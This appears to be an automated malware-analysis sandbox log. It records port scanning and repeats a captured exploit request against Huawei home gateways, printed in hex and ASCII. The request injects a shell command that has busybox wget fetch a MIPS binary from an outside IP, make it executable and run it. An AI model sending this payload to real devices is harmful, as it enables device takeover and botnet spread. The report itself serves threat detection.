                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 37940
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 53156
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56306 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56646 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43726 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53570 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43738 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51014 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33876 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 52869
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 185.36.146.208 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 197.4.160.54 ports 1,2,3,5,7,37215
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 